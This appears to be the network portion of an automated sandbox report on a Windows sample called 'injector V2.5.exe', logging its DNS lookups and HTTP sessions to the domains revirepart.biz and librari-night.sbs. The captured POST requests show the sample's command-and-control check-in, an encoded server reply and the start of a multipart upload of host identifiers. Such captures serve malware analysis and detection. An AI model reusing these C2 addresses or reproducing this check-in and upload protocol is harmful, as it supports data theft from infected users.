                                                                                                                          Nov 21, 2024 16:53:22.173527002 CET49746443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:22.173527956 CET49746443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:22.173733950 CET44349746172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:22.898611069 CET44349746172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:22.898875952 CET44349746172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:22.898993015 CET49746443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:22.910845995 CET49746443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:22.910878897 CET44349746172.67.206.172192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:22.910938025 CET49746443192.168.2.4172.67.206.172
                                                                                                                          Nov 21, 2024 16:53:22.910955906 CET44349746172.67.206.172192.168.2.4
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Nov 21, 2024 16:53:00.244534969 CET6543753192.168.2.41.1.1.1
                                                                                                                          Nov 21, 2024 16:53:00.568051100 CET53654371.1.1.1192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:02.928236961 CET5821753192.168.2.41.1.1.1
                                                                                                                          Nov 21, 2024 16:53:03.167165995 CET53582171.1.1.1192.168.2.4
                                                                                                                          Nov 21, 2024 16:53:03.175291061 CET6193153192.168.2.41.1.1.1
                                                                                                                          Nov 21, 2024 16:53:03.499919891 CET53619311.1.1.1192.168.2.4
                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Nov 21, 2024 16:53:00.244534969 CET192.168.2.41.1.1.10xf23bStandard query (0)revirepart.bizA (IP address)IN (0x0001)false
                                                                                                                          Nov 21, 2024 16:53:02.928236961 CET192.168.2.41.1.1.10xc6c2Standard query (0)processhol.sbsA (IP address)IN (0x0001)false
                                                                                                                          Nov 21, 2024 16:53:03.175291061 CET192.168.2.41.1.1.10x3a43Standard query (0)librari-night.sbsA (IP address)IN (0x0001)false
                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Nov 21, 2024 16:53:00.568051100 CET1.1.1.1192.168.2.40xf23bNo error (0)revirepart.biz104.21.43.198A (IP address)IN (0x0001)false
                                                                                                                          Nov 21, 2024 16:53:00.568051100 CET1.1.1.1192.168.2.40xf23bNo error (0)revirepart.biz172.67.184.174A (IP address)IN (0x0001)false
                                                                                                                          Nov 21, 2024 16:53:03.167165995 CET1.1.1.1192.168.2.40xc6c2Name error (3)processhol.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                          Nov 21, 2024 16:53:03.499919891 CET1.1.1.1192.168.2.40x3a43No error (0)librari-night.sbs172.67.206.172A (IP address)IN (0x0001)false
                                                                                                                          Nov 21, 2024 16:53:03.499919891 CET1.1.1.1192.168.2.40x3a43No error (0)librari-night.sbs104.21.85.146A (IP address)IN (0x0001)false
                                                                                                                          • revirepart.biz
                                                                                                                          • librari-night.sbs
                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.449733104.21.43.1984434928C:\Users\user\Desktop\injector V2.5.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-21 15:53:01 UTC261OUTPOST /api HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                          Content-Length: 8
                                                                                                                          Host: revirepart.biz
                                                                                                                          2024-11-21 15:53:01 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                          Data Ascii: act=life
                                                                                                                          2024-11-21 15:53:02 UTC992INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 21 Nov 2024 15:53:02 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: PHPSESSID=ulhhag0ono81gsshoqekj6is9o; expires=Mon, 17 Mar 2025 09:39:41 GMT; Max-Age=9999999; path=/
                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eEfJxVTRw%2B7emJ6oMXd43plaDsZGt%2BfUTvNlXblOhtKBa9fE6Gdwoilha6rs7oHTrV1dJdi6XhOS%2BQSjZeSrHVMSQRc7kmneKW1Jsdun%2FP8UWbvBoAHOwr%2B7qORtTLtYSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e61d9ac4ac272b9-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2057&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=905&delivery_rate=1454183&cwnd=222&unsent_bytes=0&cid=dc251d659c958968&ts=700&x=0"
                                                                                                                          2024-11-21 15:53:02 UTC9INData Raw: 34 0d 0a 66 61 69 6c 0d 0a
                                                                                                                          Data Ascii: 4fail
                                                                                                                          2024-11-21 15:53:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.449734172.67.206.1724434928C:\Users\user\Desktop\injector V2.5.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-21 15:53:04 UTC264OUTPOST /api HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                          Content-Length: 8
                                                                                                                          Host: librari-night.sbs
                                                                                                                          2024-11-21 15:53:04 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                          Data Ascii: act=life
                                                                                                                          2024-11-21 15:53:05 UTC1004INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 21 Nov 2024 15:53:05 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: PHPSESSID=htetd9510i1b3cff4tad521v8i; expires=Mon, 17-Mar-2025 09:39:44 GMT; Max-Age=9999999; path=/
                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J2VK5ha%2FCLY3dn15w76c%2FM%2Br4aCJWxkX3hP%2BNnUkwxMd8xFQ9hvn4UJ8GLUhrz5D2%2Bax5dG%2FYm6XHQPRBfMhe9Jp9A3RBhTB%2F6ExXSjPmEtEDlcy0KHcp%2Bb7RgNpdBSgWW6%2FrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e61d9be9b958c60-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2076&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=908&delivery_rate=1364485&cwnd=215&unsent_bytes=0&cid=59e29d7730804f3f&ts=730&x=0"
                                                                                                                          2024-11-21 15:53:05 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                          Data Ascii: 2ok
                                                                                                                          2024-11-21 15:53:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.449735172.67.206.1724434928C:\Users\user\Desktop\injector V2.5.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-21 15:53:07 UTC265OUTPOST /api HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                          Content-Length: 86
                                                                                                                          Host: librari-night.sbs
                                                                                                                          2024-11-21 15:53:07 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 62 37 30 31 36 32 31 62 63 64 30 35 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--b701621bcd05&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                                                                          2024-11-21 15:53:08 UTC995INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 21 Nov 2024 15:53:07 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: PHPSESSID=96qp6f6abu15vepqbng9lspp7r; expires=Mon, 17-Mar-2025 09:39:46 GMT; Max-Age=9999999; path=/
                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BQoiSj%2FOb9cIqoQOjWJLT6fTEjAERCVAHhnYsZYavP02iHqLFaYWfLZ01i%2FbU9Zv7rlBqCt%2F3ENqt9hUgy8jxyds6HnkRquLV4sGvyVhSpEQXV7k7sFUKEzqcUSpXfI%2FLUhb3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e61d9ce5e5eefa1-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1823&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=987&delivery_rate=1593016&cwnd=32&unsent_bytes=0&cid=a0d1bbb7372c5860&ts=746&x=0"
                                                                                                                          2024-11-21 15:53:08 UTC374INData Raw: 32 64 39 63 0d 0a 6b 57 77 4d 53 35 72 41 78 56 31 30 6b 54 6b 63 47 79 5a 41 48 32 31 4b 33 30 46 70 2f 45 47 4e 44 7a 63 55 43 46 4b 41 50 4e 62 71 54 6e 70 70 6f 50 54 70 66 77 66 30 47 79 5a 39 52 79 78 73 43 47 62 39 49 41 33 65 65 2b 74 75 57 32 64 74 66 71 4a 4b 75 37 4e 57 61 69 72 32 73 36 42 78 56 76 52 42 50 69 46 39 4f 7a 30 49 4a 50 31 37 53 35 6b 72 37 32 35 62 64 6d 6b 35 37 30 79 36 38 67 52 67 4c 50 4b 6c 70 6a 6b 56 2f 56 52 35 66 6b 4d 68 64 51 4d 6a 73 69 6b 45 33 6d 32 76 61 6b 30 32 4d 6e 44 4e 57 61 4c 77 49 57 30 34 38 65 4b 34 63 51 2b 7a 58 48 49 35 48 47 4a 2b 43 43 69 7a 4a 77 32 58 4b 65 56 6e 55 33 64 73 4f 50 42 56 73 50 6b 45 62 69 2f 7a 72 36 38 74 47 50 64 54 63 6e 68 4a 49 54 31 42 61 4c 6f 37 53 38 5a 6a 76 46 39 57 5a
                                                                                                                          Data Ascii: 2d9ckWwMS5rAxV10kTkcGyZAH21K30Fp/EGNDzcUCFKAPNbqTnppoPTpfwf0GyZ9RyxsCGb9IA3ee+tuW2dtfqJKu7NWair2s6BxVvRBPiF9Oz0IJP17S5kr725bdmk570y68gRgLPKlpjkV/VR5fkMhdQMjsikE3m2vak02MnDNWaLwIW048eK4cQ+zXHI5HGJ+CCizJw2XKeVnU3dsOPBVsPkEbi/zr68tGPdTcnhJIT1BaLo7S8ZjvF9WZ
                                                                                                                          2024-11-21 15:53:08 UTC1369INData Raw: 41 5a 45 67 37 32 70 66 66 47 55 36 35 6c 4f 35 39 51 35 75 61 62 62 69 6f 43 64 57 71 78 74 64 66 46 51 6c 63 52 6c 71 68 32 4d 55 30 44 71 76 61 6c 6b 32 4d 6e 44 71 57 37 66 77 42 57 45 71 38 4b 6d 31 50 77 54 31 56 6e 74 72 51 69 64 7a 42 53 75 76 4b 51 57 59 49 4f 5a 6d 58 48 4e 74 4e 4b 49 51 39 50 51 57 4c 6e 47 34 67 36 6f 30 47 76 6c 4d 66 6a 6c 62 62 47 52 50 4c 37 46 6a 55 39 34 6e 37 6d 6c 55 63 6d 51 2b 35 6c 4b 79 2f 51 4e 68 4c 2f 4b 69 6f 44 55 65 2b 31 70 7a 63 6b 73 69 65 41 49 73 75 79 38 4b 6d 32 4f 68 4c 56 4a 75 4b 6d 69 69 63 4c 50 77 48 43 77 63 2b 36 79 70 4f 41 43 7a 52 44 42 67 42 43 56 78 54 33 44 39 4c 51 36 52 4d 65 35 2f 55 48 68 34 50 4f 64 59 75 66 41 41 62 69 7a 2f 72 36 6b 35 45 66 42 54 65 6e 68 4b 4c 6e 63 4d 4c 4c 35
                                                                                                                          Data Ascii: AZEg72pffGU65lO59Q5uabbioCdWqxtdfFQlcRlqh2MU0Dqvalk2MnDqW7fwBWEq8Km1PwT1VntrQidzBSuvKQWYIOZmXHNtNKIQ9PQWLnG4g6o0GvlMfjlbbGRPL7FjU94n7mlUcmQ+5lKy/QNhL/KioDUe+1pzcksieAIsuy8Km2OhLVJuKmiicLPwHCwc+6ypOACzRDBgBCVxT3D9LQ6RMe5/UHh4POdYufAAbiz/r6k5EfBTenhKLncMLL5
                                                                                                                          2024-11-21 15:53:08 UTC1369INData Raw: 4f 56 70 56 58 46 6e 4e 65 46 5a 74 2f 34 4a 5a 43 66 2f 70 71 73 32 47 2f 56 62 65 58 31 42 4d 48 67 47 4a 4c 46 6a 52 64 34 6b 39 79 30 4e 4e 6b 55 33 39 46 32 62 38 42 39 6e 61 65 66 73 76 6e 38 52 2f 78 73 6d 4f 55 4d 6e 64 51 51 75 74 53 4d 5a 6d 79 33 6b 62 46 39 77 61 7a 33 75 57 4c 54 79 44 6d 67 6c 2b 4b 57 67 4c 51 54 32 58 57 78 7a 42 47 77 39 43 44 44 39 65 30 75 6f 4d 2f 68 38 51 7a 52 66 4d 2b 78 51 73 2b 56 4f 63 57 66 68 34 71 41 7a 56 71 73 62 64 58 6c 49 4a 58 55 4a 4c 4c 55 73 42 4a 63 78 37 6d 46 62 5a 47 30 77 36 31 43 37 2f 77 64 6a 4c 76 57 70 72 54 49 53 39 46 6f 2b 4e 77 51 6c 5a 55 39 77 2f 52 55 62 6b 79 2f 42 5a 6c 6c 2f 4b 69 2b 73 52 2f 54 30 41 69 35 78 75 4b 61 72 4e 78 7a 38 55 6e 52 7a 53 79 74 39 42 79 47 30 49 41 75 53
                                                                                                                          Data Ascii: OVpVXFnNeFZt/4JZCf/pqs2G/VbeX1BMHgGJLFjRd4k9y0NNkU39F2b8B9naefsvn8R/xsmOUMndQQutSMZmy3kbF9waz3uWLTyDmgl+KWgLQT2XWxzBGw9CDD9e0uoM/h8QzRfM+xQs+VOcWfh4qAzVqsbdXlIJXUJLLUsBJcx7mFbZG0w61C7/wdjLvWprTIS9Fo+NwQlZU9w/RUbky/BZll/Ki+sR/T0Ai5xuKarNxz8UnRzSyt9ByG0IAuS
                                                                                                                          2024-11-21 15:53:08 UTC1369INData Raw: 56 5a 54 51 57 67 66 34 36 7a 45 53 41 77 75 4b 57 72 66 30 36 7a 56 33 31 31 54 43 31 37 42 69 53 33 4b 67 43 53 4b 4f 74 68 58 48 4e 73 4d 65 64 62 74 66 63 43 5a 43 2f 37 6f 61 67 77 47 66 73 62 4d 44 6c 44 4f 6a 31 58 61 4a 67 30 41 4a 41 6c 72 33 49 62 62 79 6f 33 37 68 37 73 73 77 4a 6e 4c 2f 36 6e 71 7a 34 51 2b 31 35 32 66 55 55 6b 65 77 77 6e 75 53 59 4b 6b 53 66 6a 59 31 39 33 61 7a 7a 70 55 62 2f 32 54 69 42 70 2f 37 72 6e 5a 31 62 43 57 47 68 75 56 43 34 39 45 47 61 6b 59 77 79 53 59 37 63 74 56 47 52 67 4f 75 78 62 75 2f 59 4e 59 53 37 31 70 4b 73 31 48 2f 74 64 63 58 42 57 49 58 45 42 4c 37 4d 76 42 5a 4d 70 37 47 41 56 4f 43 6f 33 2b 68 37 73 73 79 4a 70 4a 4e 61 70 71 7a 68 57 37 42 56 6e 4f 55 4d 75 50 56 64 6f 73 53 6b 48 6c 79 50 6d 61
                                                                                                                          Data Ascii: VZTQWgf46zESAwuKWrf06zV311TC17BiS3KgCSKOthXHNsMedbtfcCZC/7oagwGfsbMDlDOj1XaJg0AJAlr3Ibbyo37h7sswJnL/6nqz4Q+152fUUkewwnuSYKkSfjY193azzpUb/2TiBp/7rnZ1bCWGhuVC49EGakYwySY7ctVGRgOuxbu/YNYS71pKs1H/tdcXBWIXEBL7MvBZMp7GAVOCo3+h7ssyJpJNapqzhW7BVnOUMuPVdosSkHlyPma
                                                                                                                          2024-11-21 15:53:08 UTC1369INData Raw: 7a 39 46 57 35 2f 30 35 78 5a 2b 48 69 6f 44 4e 57 71 78 74 34 64 6b 30 68 63 67 34 68 73 53 34 4f 6c 79 62 75 61 31 46 38 59 44 44 6b 57 4c 58 32 42 47 30 6f 38 71 75 67 4e 78 48 77 53 54 34 33 42 43 56 6c 54 33 44 39 43 67 79 4d 4c 66 38 74 53 6a 68 7a 63 4f 56 53 39 4b 74 4f 61 69 50 33 70 71 41 7a 45 50 5a 64 63 33 68 4c 49 33 30 41 4c 4c 59 71 44 5a 38 75 36 6d 42 52 5a 47 41 37 37 56 4b 39 2f 77 4d 75 5a 37 69 6c 76 33 39 4f 73 32 70 7a 64 30 6f 6c 61 30 38 33 38 7a 70 4c 6d 53 2b 76 4e 52 56 33 5a 6a 2f 68 55 62 66 77 44 32 51 37 36 71 36 75 4e 78 50 2f 55 48 42 2f 56 69 52 79 42 69 75 2b 4b 67 79 57 4c 2b 56 75 55 6a 59 6b 63 4f 56 47 39 4b 74 4f 54 54 37 6f 72 2b 63 67 57 4f 6f 62 65 58 55 45 65 6a 30 48 4a 62 55 70 44 35 6b 75 36 47 74 63 5a 47
                                                                                                                          Data Ascii: z9FW5/05xZ+HioDNWqxt4dk0hcg4hsS4Olybua1F8YDDkWLX2BG0o8qugNxHwST43BCVlT3D9CgyMLf8tSjhzcOVS9KtOaiP3pqAzEPZdc3hLI30ALLYqDZ8u6mBRZGA77VK9/wMuZ7ilv39Os2pzd0ola0838zpLmS+vNRV3Zj/hUbfwD2Q76q6uNxP/UHB/ViRyBiu+KgyWL+VuUjYkcOVG9KtOTT7or+cgWOobeXUEej0HJbUpD5ku6GtcZG
                                                                                                                          2024-11-21 15:53:08 UTC1369INData Raw: 73 66 41 43 5a 53 37 37 72 61 4d 32 47 50 70 55 50 6a 63 45 4a 57 56 50 63 50 30 43 45 4a 30 76 34 69 31 4b 4f 48 4e 77 35 56 4c 30 71 30 35 69 4a 2f 32 69 72 54 6b 53 39 6c 31 30 66 45 51 70 66 67 41 73 75 79 63 45 6e 69 6a 6d 62 46 4e 7a 59 44 76 6b 55 37 66 31 43 43 35 6e 75 4b 57 2f 66 30 36 7a 65 32 56 30 53 43 55 39 45 47 61 6b 59 77 79 53 59 37 63 74 58 6e 70 75 4e 2b 4a 54 74 2f 73 4c 61 69 50 39 6f 71 38 74 48 76 4e 63 62 47 74 45 4b 33 67 44 4b 37 30 6e 44 5a 63 6c 37 47 6b 56 4f 43 6f 33 2b 68 37 73 73 79 4e 69 4c 74 47 6c 76 48 38 4a 76 55 49 2b 66 6b 68 69 4a 55 38 70 74 69 6b 45 6b 79 44 70 62 6c 35 7a 59 44 48 6c 56 72 6e 68 44 57 45 6d 2f 4b 4b 6f 4f 52 44 79 56 48 68 2b 54 53 4e 31 43 47 6a 7a 59 77 79 47 59 37 63 74 65 33 46 70 4e 4b 4a
                                                                                                                          Data Ascii: sfACZS77raM2GPpUPjcEJWVPcP0CEJ0v4i1KOHNw5VL0q05iJ/2irTkS9l10fEQpfgAsuycEnijmbFNzYDvkU7f1CC5nuKW/f06ze2V0SCU9EGakYwySY7ctXnpuN+JTt/sLaiP9oq8tHvNcbGtEK3gDK70nDZcl7GkVOCo3+h7ssyNiLtGlvH8JvUI+fkhiJU8ptikEkyDpbl5zYDHlVrnhDWEm/KKoORDyVHh+TSN1CGjzYwyGY7cte3FpNKJ
                                                                                                                          2024-11-21 15:53:08 UTC1369INData Raw: 47 41 75 37 75 4c 70 66 78 6d 7a 41 30 63 35 44 47 4a 43 51 57 69 6c 59 31 50 65 46 75 78 6a 57 33 46 38 49 61 39 35 72 76 34 49 65 54 69 34 37 4f 63 35 56 71 73 4c 4d 44 6c 41 4d 7a 31 58 65 4f 39 34 58 73 31 30 76 7a 39 4b 4f 48 4e 77 39 42 37 73 6f 55 41 75 4f 37 6a 36 35 33 67 56 34 55 6c 34 65 6c 49 68 4f 6a 45 57 6b 79 51 4e 6d 79 54 2f 4c 33 74 39 66 6a 65 69 45 50 54 38 54 6a 59 51 75 4f 72 6e 41 46 69 7a 51 7a 34 68 42 42 64 2b 41 53 61 36 4e 52 72 54 44 65 68 72 55 48 46 36 63 73 78 56 6f 50 52 4f 49 47 6e 2b 34 76 39 76 57 4c 4e 66 62 7a 6b 63 63 69 39 55 66 65 35 30 57 38 77 38 6f 58 51 56 59 43 70 6f 73 42 44 30 34 55 34 32 61 62 2b 68 74 53 30 51 38 45 31 39 50 6e 6f 63 66 68 6b 6c 73 69 67 4b 6f 42 33 42 59 46 52 31 5a 48 4c 54 53 4c 6e 6a
                                                                                                                          Data Ascii: GAu7uLpfxmzA0c5DGJCQWilY1PeFuxjW3F8Ia95rv4IeTi47Oc5VqsLMDlAMz1XeO94Xs10vz9KOHNw9B7soUAuO7j653gV4Ul4elIhOjEWkyQNmyT/L3t9fjeiEPT8TjYQuOrnAFizQz4hBBd+ASa6NRrTDehrUHF6csxVoPROIGn+4v9vWLNfbzkcci9Ufe50W8w8oXQVYCposBD04U42ab+htS0Q8E19PnocfhklsigKoB3BYFR1ZHLTSLnj
                                                                                                                          2024-11-21 15:53:08 UTC1369INData Raw: 6d 30 74 79 67 5a 76 48 56 49 57 41 52 73 50 51 6c 6f 35 58 46 46 33 69 66 2b 4c 51 30 6d 4f 47 75 33 44 65 4f 6a 58 48 46 6e 34 65 4b 78 66 30 36 68 46 54 35 72 42 48 6f 39 53 43 75 76 4d 51 32 64 4e 65 77 71 61 30 68 4e 50 75 56 66 6f 75 4d 44 59 67 6a 37 73 36 30 42 4b 4f 5a 59 63 48 64 44 4e 47 78 50 5a 76 30 73 53 38 59 61 72 79 55 56 53 53 52 77 2b 68 37 73 73 7a 74 74 4a 2f 61 6c 73 53 35 62 31 46 56 35 65 46 49 79 63 41 4d 4a 76 6a 49 42 33 6d 32 76 61 78 55 75 4f 48 36 69 57 71 57 7a 56 6a 35 37 6f 2f 66 30 61 45 61 68 52 44 42 67 42 44 51 39 56 33 72 7a 59 78 6e 65 65 36 38 71 56 6d 52 34 4e 75 46 49 74 37 51 77 55 41 7a 76 6f 62 63 35 46 63 31 6c 56 58 56 43 4a 57 63 49 4c 70 73 44 53 39 42 6a 34 43 30 4e 54 79 70 34 6f 6d 48 36 73 78 59 75 63
                                                                                                                          Data Ascii: m0tygZvHVIWARsPQlo5XFF3if+LQ0mOGu3DeOjXHFn4eKxf06hFT5rBHo9SCuvMQ2dNewqa0hNPuVfouMDYgj7s60BKOZYcHdDNGxPZv0sS8YaryUVSSRw+h7sszttJ/alsS5b1FV5eFIycAMJvjIB3m2vaxUuOH6iWqWzVj57o/f0aEahRDBgBDQ9V3rzYxnee68qVmR4NuFIt7QwUAzvobc5Fc1lVXVCJWcILpsDS9Bj4C0NTyp4omH6sxYuc
                                                                                                                          2024-11-21 15:53:08 UTC1369INData Raw: 76 46 62 46 2b 52 44 74 31 4e 48 34 50 4a 72 70 6a 46 4e 41 36 72 33 73 56 4c 6a 6c 2b 6f 6b 7a 30 71 30 34 70 4a 2f 57 6a 70 44 45 56 34 55 6c 34 65 6c 49 68 4f 6a 45 57 6b 69 67 4b 6a 69 37 2b 59 46 46 67 56 41 37 46 57 4c 48 30 4d 46 41 65 36 61 57 33 66 54 44 77 54 58 30 35 43 6d 4a 6c 54 33 44 39 42 41 32 62 4a 4b 38 6a 46 58 49 71 61 4b 4a 78 76 2f 49 65 59 7a 6a 31 70 72 46 39 4d 66 56 65 65 54 6b 4b 59 6e 46 50 63 50 30 73 47 70 6b 6c 36 6d 6f 5a 63 58 41 33 6f 68 44 30 2f 55 34 32 61 66 65 7a 6f 44 6b 54 39 42 64 34 64 30 70 69 59 6b 45 78 2f 54 56 4c 78 6e 43 68 4c 55 63 32 4d 6e 43 6c 55 4c 6e 79 44 57 41 71 36 72 43 68 50 41 44 77 48 45 42 48 5a 44 4a 2b 47 79 2b 4d 4c 67 2b 49 4e 75 78 39 55 6b 68 55 45 50 4a 64 6f 50 52 42 54 6a 6e 31 74 37
                                                                                                                          Data Ascii: vFbF+RDt1NH4PJrpjFNA6r3sVLjl+okz0q04pJ/WjpDEV4Ul4elIhOjEWkigKji7+YFFgVA7FWLH0MFAe6aW3fTDwTX05CmJlT3D9BA2bJK8jFXIqaKJxv/IeYzj1prF9MfVeeTkKYnFPcP0sGpkl6moZcXA3ohD0/U42afezoDkT9Bd4d0piYkEx/TVLxnChLUc2MnClULnyDWAq6rChPADwHEBHZDJ+Gy+MLg+INux9UkhUEPJdoPRBTjn1t7


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.449736172.67.206.1724434928C:\Users\user\Desktop\injector V2.5.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-21 15:53:09 UTC281OUTPOST /api HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: multipart/form-data; boundary=RVW4WPQQS5P19VGZ
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                          Content-Length: 18158
                                                                                                                          Host: librari-night.sbs
                                                                                                                          2024-11-21 15:53:09 UTC15331OUTData Raw: 2d 2d 52 56 57 34 57 50 51 51 53 35 50 31 39 56 47 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 44 45 41 44 44 34 43 33 45 34 42 35 42 37 34 41 46 46 35 41 44 45 43 39 45 36 42 44 37 37 0d 0a 2d 2d 52 56 57 34 57 50 51 51 53 35 50 31 39 56 47 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 56 57 34 57 50 51 51 53 35 50 31 39 56 47 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 37 30 31 36 32 31 62 63 64 30
                                                                                                                          Data Ascii: --RVW4WPQQS5P19VGZContent-Disposition: form-data; name="hwid"F5DEADD4C3E4B5B74AFF5ADEC9E6BD77--RVW4WPQQS5P19VGZContent-Disposition: form-data; name="pid"2--RVW4WPQQS5P19VGZContent-Disposition: form-data; name="lid"HpOoIh--b701621bcd0
